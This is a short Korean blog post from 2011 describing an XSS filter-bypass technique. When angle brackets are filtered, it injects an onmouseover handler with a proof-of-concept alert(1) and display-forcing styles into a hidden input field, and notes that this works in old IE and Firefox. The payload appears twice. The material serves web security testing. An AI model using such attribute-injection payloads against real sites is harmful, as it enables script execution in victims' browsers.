위험한_친구들/십자군_XSS
XSS in hidden field
bitfox
2011. 10. 11. 15:39
type에 hidden 속성을 갖고 있으며 <, > 태그를 필터링하고 있을 경우.
<input type="hidden" onmouseover="javascript:alert(1)" style="display:block; width:500px; height:500px;" />
IE6, 7, 8 혹은 FireFox
Good Luck~ :-)
<input type="hidden" onmouseover="javascript:alert(1)" style="display:block; width:500px; height:500px;" />
IE6, 7, 8 혹은 FireFox
Good Luck~ :-)